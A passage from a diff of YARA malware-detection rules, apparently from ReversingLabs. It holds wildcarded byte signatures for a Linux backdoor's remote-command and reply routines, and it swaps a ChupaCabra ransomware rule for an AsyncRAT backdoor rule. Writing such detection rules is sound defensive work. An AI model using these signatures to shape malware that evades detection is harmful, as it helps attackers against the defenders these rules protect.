?? 01 D0 89 45 ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 45 ?? 0F B7 40 ?? 66 89 45 ?? 8B 45 + ?? 0F B7 10 8B 45 ?? 66 89 50 ?? 8B 55 ?? 0F B7 45 ?? 66 89 02 8B 45 ?? 89 C2 8D 85 + ?? ?? ?? ?? 01 D0 89 45 ?? 8B 45 ?? C6 40 ?? ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 45 ?? + 89 C2 8D 85 ?? ?? ?? ?? 01 D0 89 45 ?? 8B 45 ?? 66 C7 40 ?? ?? ?? 66 81 BD ?? ?? ?? + ?? ?? ?? 76 ?? 8B 45 ?? 83 C0 ?? BA ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? + 8B 45 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 14 24 E8 ?? ?? ?? ?? C7 04 24 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 45 ?? 66 C7 40 ?? ?? ?? EB ?? 8B + 45 ?? 83 C0 ?? 0F B7 95 ?? ?? ?? ?? B9 ?? ?? ?? ?? 89 44 24 ?? 89 54 24 ?? 8B 45 ?? + 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 0C 24 E8 ?? ?? ?? ?? 0F B7 85 ?? ?? ?? ?? 83 + } + $send_result_to_peer_v1_p2 = { + C0 ?? 0F B7 C0 89 04 24 E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 55 ?? 0F B7 85 + ?? ?? ?? ?? 66 89 42 ?? 8B 45 ?? 0F B7 40 ?? 83 C0 ?? 0F B7 C0 89 04 24 E8 ?? ?? ?? + ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 45 ?? 0F B7 50 ?? 8B 45 ?? 0F B7 40 ?? 8D 04 02 8D + 50 ?? 8B 45 ?? 66 89 50 ?? 8B 45 ?? 0F B7 40 ?? 0F B7 C0 89 04 24 E8 ?? ?? ?? ?? 89 + C2 8B 45 ?? 66 89 50 ?? 8B 45 ?? 0F B7 40 ?? 0F B7 C0 89 04 24 E8 ?? ?? ?? ?? 66 89 + 45 ?? 8B 45 ?? 66 C7 40 ?? ?? ?? 0F B7 4D ?? 8B 5D ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 8B + 40 ?? 89 4C 24 ?? 89 5C 24 ?? 89 54 24 ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 55 ?? 0F B6 42 ?? 83 C8 ?? 88 42 ?? 0F B7 45 ?? + 83 C0 ?? 0F B7 C0 89 04 24 E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 45 ?? 66 C7 + 40 ?? ?? ?? 0F B7 45 ?? 83 C0 ?? 8D 95 ?? ?? ?? ?? 89 44 24 ?? 89 14 24 E8 ?? ?? ?? + ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 45 ?? 8B 40 ?? 89 85 ?? ?? ?? ?? 66 C7 85 ?? ?? ?? + ?? ?? ?? 8B 45 ?? 0F B7 40 ?? 66 89 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 0F B7 45 ?? 83 + C0 ?? C7 44 24 ?? ?? ?? ?? ?? 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 8D 85 + ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 5B 5E 5F + 5D C3 } - - condition: - uint16(0)==0x5A4D and ($enum_resources) and ($search_files) and ($encrypt_files) and ($remote_connection) + $execute_remote_command_v1 = { + 55 89 E5 57 83 EC ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? + B9 ?? ?? ?? ?? 89 45 ?? B8 ?? ?? ?? ?? FC 8B 7D ?? F2 AE 89 C8 F7 D0 83 E8 ?? 03 45 + ?? 66 C7 00 ?? ?? C6 40 ?? ?? 8B 45 ?? B9 ?? ?? ?? ?? 89 45 ?? B8 ?? ?? ?? ?? FC 8B + 7D ?? F2 AE 89 C8 F7 D0 83 E8 ?? 66 89 45 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 + 24 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? + ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 0F B7 45 ?? 89 C2 03 55 ?? 8B 45 ?? 89 44 24 + ?? C7 44 24 ?? ?? ?? ?? ?? 89 14 24 E8 ?? ?? ?? ?? 8B 45 ?? B9 ?? ?? ?? ?? 89 45 ?? + B8 ?? ?? ?? ?? FC 8B 7D ?? F2 AE 89 C8 F7 D0 83 E8 ?? 0F B7 C0 89 45 ?? EB ?? 8B 45 + ?? 89 04 24 E8 ?? ?? ?? ?? 88 45 ?? 80 7D ?? ?? 74 ?? 0F B7 45 ?? 89 C2 03 55 ?? 0F + B6 45 ?? 88 02 66 83 45 ?? ?? 66 81 7D ?? ?? ?? 76 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? + ?? 0F B7 45 ?? 89 45 ?? 8B 45 ?? 83 C4 ?? 5F 5D C3 + } + $send_reply_v1_p1 = { + 55 89 E5 81 EC ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 83 C0 ?? 89 + 45 ?? 8D 85 ?? ?? ?? ?? 89 C2 B8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 + 14 24 E8 ?? ?? ?? ?? 8B 55 ?? 0F B6 02 83 E0 ?? 83 C8 ?? 88 02 8B 55 ?? 0F B6 02 83 + E0 ?? 83 C8 ?? 88 02 8B 45 ?? C6 40 ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2 + 8B 45 ?? 66 89 50 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ?? + C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 E0 ?? 8B 55 ?? 89 C1 83 E1 ?? 0F B6 42 ?? 83 + E0 ?? 09 C8 88 42 ?? 8B 45 ?? 0F B6 50 ?? 8B 45 ?? 88 50 ?? 8B 45 ?? C6 40 ?? ?? 8B + 45 ?? 8B 50 ?? 8B 45 ?? 89 50 ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 89 50 ?? C7 44 24 ?? ?? + ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 45 + ?? 8B 40 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 40 ?? 89 04 24 E8 ?? ?? ?? + ?? 89 45 ?? 8B 45 ?? 0F B7 50 ?? 8B 45 ?? 66 89 10 8B 45 ?? 0F B7 10 8B 45 ?? 66 89 + 50 ?? 8B 45 ?? 0F B6 40 ?? 3C ?? 75 ?? 8B 45 ?? 0F B7 40 ?? 0F B7 C0 89 04 24 E8 ?? + ?? ?? ?? 66 89 45 ?? 0F B7 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ?? + 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 89 50 ?? 8B 45 ?? 89 04 24 E8 ?? ?? + ?? ?? 89 C2 8B 45 ?? 89 50 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 + 89 50 ?? EB ?? 8B 45 ?? 0F B6 40 ?? 3C ?? 75 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 89 C2 8B 45 ?? 89 50 ?? 8B 45 ?? 83 C0 ?? 89 04 24 E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 89 + } + $send_reply_v1_p2 = { + 50 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 55 ?? 0F B6 + 42 ?? 83 E0 ?? 88 42 ?? 8B 55 ?? 0F B6 42 ?? 83 E0 ?? 83 C8 ?? 88 42 ?? 8B 45 ?? C6 + 40 ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ?? 8B 45 ?? 8B + 40 ?? 89 85 ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 89 85 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 + 85 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 8D 95 ?? + ?? ?? ?? B8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 14 24 E8 ?? ?? ?? ?? + 8D 8D ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8B 02 89 01 8B 42 ?? 89 41 ?? 8B 42 ?? 89 41 ?? + 8D 85 ?? ?? ?? ?? 8D 48 ?? 8B 55 ?? 8B 02 89 01 8B 42 ?? 89 41 ?? 8B 42 ?? 89 41 ?? + 8B 42 ?? 89 41 ?? 8B 42 ?? 89 41 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 04 + 24 E8 ?? ?? ?? ?? 89 C2 8B 45 ?? 66 89 50 ?? 8D 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 44 + 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 14 24 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? + 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 66 C7 85 ?? ?? ?? ?? ?? ?? 8B + 45 ?? 8B 40 ?? 89 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 55 ?? 8B 02 89 01 8B 42 ?? 89 + } + $send_reply_v1_p3 = { + 41 ?? 8B 42 ?? 89 41 ?? 8B 42 ?? 89 41 ?? 8B 42 ?? 89 41 ?? 8D 85 ?? ?? ?? ?? 8D 48 + ?? 8B 55 ?? 8B 02 89 01 8B 42 ?? 89 41 ?? 8B 42 ?? 89 41 ?? 8B 42 ?? 89 41 ?? 8B 42 + ?? 89 41 ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? + ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 8B 95 + ?? ?? ?? ?? A1 ?? ?? ?? ?? 39 C2 0F 85 ?? ?? ?? ?? 8B 45 ?? 0F B6 40 ?? 3C ?? 74 ?? + 8B 45 ?? 0F B6 40 ?? 3C ?? 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? + ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 8B 04 C5 ?? ?? ?? ?? 85 C0 75 + ?? 83 7D ?? ?? 75 ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 8B 14 C5 ?? ?? ?? ?? B8 ?? + ?? ?? ?? 29 D0 89 C1 B8 ?? ?? ?? ?? D3 E0 89 45 ?? 8B 45 ?? 8B 04 C5 ?? ?? ?? ?? 23 + 45 ?? 89 45 ?? 8B 45 ?? 23 45 ?? 89 45 ?? 8B 45 ?? 3B 45 ?? 75 ?? C7 45 ?? ?? ?? ?? + ?? EB ?? 83 45 ?? ?? 83 7D ?? ?? 7E ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? + ?? 75 ?? 8B 45 ?? 89 44 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? + 8B 0D ?? ?? ?? ?? 8B 45 ?? 89 44 24 ?? 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 + } + $daemon_already_running_check_v1 = { + 55 89 E5 57 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 79 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 8B 00 83 F8 ?? 74 ?? E8 + ?? ?? ?? ?? 8B 00 83 F8 ?? 75 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? + ?? EB ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 + 24 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 45 ?? 89 04 + 24 E8 ?? ?? ?? ?? 8D 45 ?? B9 ?? ?? ?? ?? 89 45 ?? B8 ?? ?? ?? ?? FC 8B 7D ?? F2 AE + 89 C8 F7 D0 83 E8 ?? 83 C0 ?? 89 44 24 ?? 8D 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 E8 + ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 5F 5D C3 + } + $send_result_to_peer_v2_p1 = { + 55 48 89 E5 48 81 EC ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 48 89 B5 ?? ?? ?? ?? 48 89 8D ?? + ?? ?? ?? 44 89 C0 66 89 95 ?? ?? FF FF 66 89 85 ?? ?? FF FF 48 8D BD ?? ?? ?? ?? BA + ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 81 BD ?? ?? FF FF + ?? ?? 77 ?? 0F B7 8D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 89 C7 + 48 89 D6 FC F3 A4 EB ?? 48 8D 85 ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 48 89 C7 48 89 D6 + BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 45 ?? 48 8B 45 ?? 8B 40 ?? + 89 45 ?? 48 8B 45 ?? 8B 50 ?? 48 8B 45 ?? 89 50 ?? 48 8B 55 ?? 8B 45 ?? 89 42 ?? 8B + 45 ?? 83 C0 ?? 89 45 ?? 8B 45 ?? 48 98 48 89 C2 48 8D 85 ?? ?? ?? ?? 48 01 D0 48 89 + 45 ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 48 8B 45 ?? 0F B7 40 ?? 66 89 45 ?? 48 8B 45 ?? 0F + B7 10 48 8B 45 ?? 66 89 50 ?? 48 8B 55 ?? 0F B7 45 ?? 66 89 02 8B 45 ?? 48 98 48 89 + C2 48 8D 85 ?? ?? ?? ?? 48 01 D0 48 89 45 ?? 48 8B 45 ?? C6 40 ?? ?? 8B 45 ?? 83 C0 + ?? 89 45 ?? 8B 45 ?? 48 98 48 89 C2 48 8D 85 ?? ?? ?? ?? 48 01 D0 48 89 45 ?? 48 8B + 45 ?? 66 C7 40 ?? ?? ?? 66 81 BD ?? ?? FF FF ?? ?? 76 ?? 48 8B 45 ?? 48 83 C0 ?? BF + ?? ?? ?? ?? 48 8B 95 ?? ?? ?? ?? 49 89 C0 B9 ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? + ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2 48 8B 45 ?? 66 89 50 ?? 48 8B 45 ?? 66 C7 40 + ?? ?? ?? EB ?? 48 8B 45 ?? 48 83 C0 ?? 0F B7 8D ?? ?? ?? ?? BF ?? ?? ?? ?? 48 8B 95 + ?? ?? ?? ?? 49 89 C0 BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B7 85 ?? ?? ?? ?? 83 C0 ?? 0F + } + $send_result_to_peer_v2_p2 = { + B7 F8 E8 ?? ?? ?? ?? 89 C2 48 8B 45 ?? 66 89 50 ?? 48 8B 55 ?? 0F B7 85 ?? ?? ?? ?? + 66 89 42 ?? 48 8B 45 ?? 0F B7 40 ?? 83 C0 ?? 0F B7 F8 E8 ?? ?? ?? ?? 89 C2 48 8B 45 + ?? 66 89 50 ?? 48 8B 45 ?? 0F B7 50 ?? 48 8B 45 ?? 0F B7 40 ?? 8D 04 02 8D 50 ?? 48 + 8B 45 ?? 66 89 50 ?? 48 8B 45 ?? 0F B7 40 ?? 0F B7 F8 E8 ?? ?? ?? ?? 89 C2 48 8B 45 + ?? 66 89 50 ?? 48 8B 45 ?? 0F B7 40 ?? 0F B7 F8 E8 ?? ?? ?? ?? 66 89 45 ?? 48 8B 45 + ?? 66 C7 40 ?? ?? ?? 0F B7 4D ?? 48 8B 7D ?? 48 8B 45 ?? 8B 50 ?? 48 8B 45 ?? 8B 70 + ?? 41 89 C8 48 89 F9 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2 48 8B 45 ?? 66 89 50 ?? 48 + 8B 55 ?? 0F B6 42 ?? 83 C8 ?? 88 42 ?? 0F B7 45 ?? 83 C0 ?? 0F B7 F8 E8 ?? ?? ?? ?? + 89 C2 48 8B 45 ?? 66 89 50 ?? 48 8B 45 ?? 66 C7 40 ?? ?? ?? 0F B7 45 ?? 83 C0 ?? 89 + C6 48 8D BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2 48 8B 45 ?? 66 89 50 ?? 48 8B 45 ?? 8B + 40 ?? 89 85 ?? ?? ?? ?? 66 C7 85 ?? ?? FF FF ?? ?? 48 8B 45 ?? 0F B7 40 ?? 66 89 85 + ?? ?? FF FF 48 8D 95 ?? ?? ?? ?? 0F B7 45 ?? 48 83 C0 ?? 48 8D B5 ?? ?? ?? ?? 8B BD + ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 49 89 D0 B9 ?? ?? ?? ?? 48 89 C2 E8 ?? ?? ?? ?? C9 C3 + } + $execute_remote_command_v2 = { + 55 48 89 E5 48 83 EC ?? 48 89 7D ?? 48 89 75 ?? 48 8B 75 ?? 48 8B 7D ?? E8 ?? ?? ?? + ?? 48 8B 45 ?? 48 C7 C1 ?? ?? ?? ?? 48 89 45 ?? B8 ?? ?? ?? ?? FC 48 8B 7D ?? F2 AE + 48 89 C8 48 F7 D0 48 83 E8 ?? 48 03 45 ?? 66 C7 00 ?? ?? C6 40 ?? ?? 48 8B 45 ?? 48 + C7 C1 ?? ?? ?? ?? 48 89 45 ?? B8 ?? ?? ?? ?? FC 48 8B 7D ?? F2 AE 48 89 C8 48 F7 D0 + 48 83 E8 ?? 66 89 45 ?? 48 8B 7D ?? BE ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 + 98 48 89 45 ?? 48 83 7D ?? ?? 0F 85 ?? ?? ?? ?? 48 8B 7D ?? E8 ?? ?? ?? ?? 48 8B 7D + ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B7 45 ?? 48 89 C7 48 03 7D ?? 48 8B 55 ?? BE ?? + ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 45 ?? 48 C7 C1 ?? ?? ?? ?? 48 89 45 ?? + B8 ?? ?? ?? ?? FC 48 8B 7D ?? F2 AE 48 89 C8 48 F7 D0 48 83 E8 ?? 0F B7 C0 89 45 ?? + EB ?? 48 8B 7D ?? E8 ?? ?? ?? ?? 88 45 ?? 80 7D ?? ?? 74 ?? 0F B7 45 ?? 48 89 C2 48 + 03 55 ?? 0F B6 45 ?? 88 02 66 83 45 ?? ?? 66 81 7D ?? ?? ?? 76 ?? 48 8B 7D ?? B8 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 0F B7 45 ?? 89 45 ?? 8B 45 ?? C9 C3 + } + $main_routine_v2_p1 = { + 55 48 89 E5 48 81 EC ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 48 89 B5 ?? ?? ?? ?? C7 45 ?? ?? + ?? ?? ?? 48 8D BD ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 85 + ?? ?? ?? ?? 48 8B 00 48 C7 C1 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? FC 48 + 8B BD ?? ?? ?? ?? F2 AE 48 89 C8 48 F7 D0 48 83 E8 ?? 48 83 F8 ?? 76 ?? 48 8B 85 ?? + ?? ?? ?? 48 8B 00 48 C7 C1 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? FC 48 8B + BD ?? ?? ?? ?? F2 AE 48 89 C8 48 F7 D0 48 8D 50 ?? 48 8B 85 ?? ?? ?? ?? 48 8B 00 48 + 89 C7 FC 48 89 D1 B8 ?? ?? ?? ?? F3 AA 48 8B 85 ?? ?? ?? ?? 48 8B 00 C7 00 ?? ?? ?? + ?? C7 40 ?? ?? ?? ?? ?? 66 C7 40 ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? + ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? + 75 ?? E8 ?? ?? ?? ?? 8B 38 E8 ?? ?? ?? ?? 48 89 C6 BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 + ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 8D ?? + ?? ?? ?? 8B 7D ?? 41 B8 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 + C0 79 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 BA ?? ?? + ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D B5 ?? ?? ?? ?? 8B 7D ?? B9 ?? ?? ?? ?? BA + ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 7E ?? 48 8D 85 ?? ?? ?? ?? 48 89 45 + ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 48 98 48 89 C2 48 8D 85 ?? ?? ?? ?? 48 01 D0 48 89 + } + $main_routine_v2_p2 = { + 45 ?? 48 8B 45 ?? 0F B7 40 ?? 0F B7 F8 E8 ?? ?? ?? ?? 66 3D ?? ?? 75 ?? 8B 45 ?? 83 + C0 ?? 89 45 ?? 8B 45 ?? 48 98 48 89 C2 48 8D 85 ?? ?? ?? ?? 48 01 D0 48 89 45 ?? 8B + 45 ?? 83 C0 ?? 89 45 ?? 48 8B 45 ?? 0F B6 40 ?? 3C ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 48 + 98 48 89 C2 48 8D 85 ?? ?? ?? ?? 48 01 D0 48 89 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? + 48 8B 45 ?? 48 83 C0 ?? 48 8D 95 ?? ?? ?? ?? 8B 00 89 02 8B 95 ?? ?? ?? ?? 8B 05 ?? + ?? ?? ?? 39 C2 74 ?? 8B 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? BF ?? ?? ?? ?? B8 ?? ?? ?? + ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 45 ?? 0F B7 40 ?? 0F B7 C8 48 8B 45 ?? 0F B6 + 40 ?? 0F B6 D0 8B 75 ?? BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 75 ?? 48 + 83 C6 ?? 48 8B 45 ?? 0F B7 40 ?? 0F B7 C8 48 8B 55 ?? 48 83 C2 ?? BF ?? ?? ?? ?? 49 + 89 F0 BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 45 ?? 0F B6 40 ?? 84 C0 0F 84 ?? ?? ?? ?? + 48 8B 45 ?? 0F B6 40 ?? 3C ?? 75 ?? 48 8B 45 ?? 48 83 C0 ?? 8B 00 89 05 ?? ?? ?? ?? + 48 8D BD ?? ?? ?? ?? FC B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? F3 AA 48 8D 85 ?? ?? ?? ?? 48 + } + $main_routine_v2_p3 = { + C7 C1 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? FC 48 8B BD ?? ?? ?? ?? F2 AE + 48 89 C8 48 F7 D0 48 83 E8 ?? 0F B7 C8 4C 8D 8D ?? ?? ?? ?? 8B 45 ?? 0F B7 D0 48 8D + B5 ?? ?? ?? ?? 8B 7D ?? 41 89 C8 4C 89 C9 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 45 ?? + 0F B6 40 ?? 3C ?? 0F 85 ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 85 C0 75 ?? BE ?? ?? ?? + ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 05 ?? ?? ?? ?? 48 8B 3D ?? ?? ?? ?? BA ?? ?? + ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 8B 45 ?? 0F B7 40 ?? 0F + B7 D0 48 8B 7D ?? 48 83 C7 ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 45 ?? 0F B7 40 ?? + 0F B7 D0 8B 05 ?? ?? ?? ?? 8D 04 02 89 05 ?? ?? ?? ?? 48 8B 45 ?? 0F B7 50 ?? 0F B7 + 05 ?? ?? ?? ?? 66 39 C2 0F 84 ?? ?? ?? ?? 48 8B 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 C7 + 05 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D BD ?? ?? ?? ?? FC B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? F3 + AA 8B 15 ?? ?? ?? ?? 48 8D BD ?? ?? ?? ?? BE ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 48 8D B5 ?? ?? ?? ?? BF ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 85 + } + + condition: + uint32(0)==0x464C457F and ((( all of ($send_result_to_peer_v1_p*)) and ($execute_remote_command_v1) and ( all of ($send_reply_v1_p*)) and ($daemon_already_running_check_v1)) or (( all of ($send_result_to_peer_v2_p*)) and ($execute_remote_command_v2) and ( all of ($main_routine_v2_p*)))) } -rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Chupacabra : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Bytecode_MSIL_Backdoor_Asyncrat : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects ChupaCabra ransomware." + description = "Yara rule that detects AsyncRAT backdoor." author = "ReversingLabs" - id = "e44a101d-53c3-51f2-84ca-f6a5858c169b" - date = "2021-10-12" - modified = "2021-10-12" + id = "78ff36e1-1620-50f4-8abd-adcf8b1242da" + date = "2024-05-22" + modified = "2024-05-22" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/ByteCode.MSIL.Ransomware.ChupaCabra.yara#L1-L90" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "7f247778e0bd8057670abf42b2d1011ebae891ffcb21ebad50060f9a7986bf93" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/backdoor/ByteCode.MSIL.Backdoor.AsyncRAT.yara#L1-L149" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "53a13975cd53b571910f951adc44707c11b86c003eeb7b88dbe701253645ac89" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "ChupaCabra" + tc_detection_type = "Backdoor" + tc_detection_name = "AsyncRAT" tc_detection_factor = 5 importance = 25 strings: - $encrypt_files_p1 = { - 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 7E ?? ?? ?? ?? 28 - ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 14 0A 14 0B 7E ?? ?? ?? ?? 7E ?? ?? - ?? ?? 73 ?? ?? ?? ?? 0C 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0D 09 73 ?? ?? ?? ?? 13 ?? 73 ?? - ?? ?? ?? 0A 06 08 06 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 11 ?? 28 ?? - ?? ?? ?? 6F ?? ?? ?? ?? 06 06 6F 